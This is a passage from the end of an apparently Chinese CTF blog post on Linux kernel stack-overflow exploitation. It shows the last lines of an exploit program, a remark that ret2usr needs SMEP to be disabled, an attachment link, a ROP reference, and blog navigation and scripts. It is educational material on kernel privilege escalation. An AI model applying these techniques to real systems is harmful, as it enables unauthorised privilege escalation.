payload_len);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>ret2usr是基于<code>SEMP</code>保护未开启的条件下才能利用的，在开启情况下可以利用其他方法绕过，以后具体分析</p>
<h1 id="Attachment"><a href="#Attachment" class="headerlink" title="Attachment"></a>Attachment</h1><p>Stack_Overflow：链接: <a href="https://pan.baidu.com/s/1jBMT3mDP7Bm0Unqxl6FblA">https://pan.baidu.com/s/1jBMT3mDP7Bm0Unqxl6FblA</a> 提取码: sp2s</p>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/">Linux Kernel ROP</a></p>

        </div>
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/kernel/">kernel</a>, <a class="has-link-grey -link" href="/tags/pwn/">pwn</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2020/02/06/Linux_Kernel_Pwn_4.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">Linux Kernel Pwn Ⅳ：Double Fetch</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2020/02/06/Linux_Kernel_Pwn_2.html">
                <span class="level-item">Linux Kernel Pwn Ⅱ：Null Pointer Dereference</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>


</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        


    <div class="card widget column-left is-sticky" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    目录
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#Vul-LKM">
        <span class="has-mr-6">1</span>
        <span>Vul LKM</span>
        </a></li><li>
        <a class="is-flex" href="#Exploit">
        <span class="has-mr-6">2</span>
        <span>Exploit</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#ROP">
        <span class="has-mr-6">2.1</span>
        <span>ROP</span>
        </a></li><li>
        <a class="is-flex" href="#ret2usr">
        <span class="has-mr-6">2.2</span>
        <span>ret2usr</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#Attachment">
        <span class="has-mr-6">3</span>
        <span>Attachment</span>
        </a></li><li>
        <a class="is-flex" href="#Reference">
        <span class="has-mr-6">4</span>
        <span>Reference</span>
        </a></li></ul>
            </div>
        </div>
    </div>

    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="" src="/images/avatar.png" alt="Mask">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        Mask
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        A newbie in CTF
                    </p>
                    
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <a href="/archives">
                        <p class="title has-text-weight-normal">
                            20
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <a href="/categories">
                        <p class="title has-text-weight-normal">
                            4
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <a href="/tags">
                        <p class="title has-text-weight-normal">
                            13
                        </p>
                    </a>
                </div>
            </div>
        </nav>
        
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Github" href="https://github.com/mask6asok">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="QQ" href="tencent://message/?uin=1924594189&amp;Site=&amp;menu=yes">
                
                <i class="fab fa-qq"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Email" href="mailto:1924594189@qq.com">
                
                <i class="fa fa-envelope"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            链接
        </h3>
        <ul class="menu-list">
        
            <li>
                <a class="level is-mobile" href="https://binlep.github.io/" target="_blank" rel="noopener">
                    <span class="level-left">
                        <span class="level-item">binLep&#39;s blog</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">binlep.github.io</span>
                    </span>
                </a>
            </li>
        
        </ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.ico" alt="Linux Kernel Pwn Ⅲ：Stack Overflow" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2020 Mask&nbsp;
                Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>


<script>
var IcarusThemeSettings = {
    site: {
        url: 'Mask6asok.github.io',
        external_link: {"enable":true,"exclude":[]}
    },
    article: {
        highlight: {
            clipboard: false,
            fold: ''
        }
    }
};
</script>






<script src="/js/animation.js"></script>



<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>



<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>


<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>














<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>